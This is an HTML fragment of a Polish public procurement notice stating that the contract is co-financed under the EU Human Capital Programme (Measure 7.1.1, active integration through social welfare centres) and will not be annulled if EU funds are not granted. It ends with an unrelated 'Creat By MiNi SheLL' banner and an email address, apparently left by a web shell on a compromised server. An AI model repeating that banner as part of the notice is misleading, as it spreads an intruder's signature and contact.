<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach Programu Europejskiego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com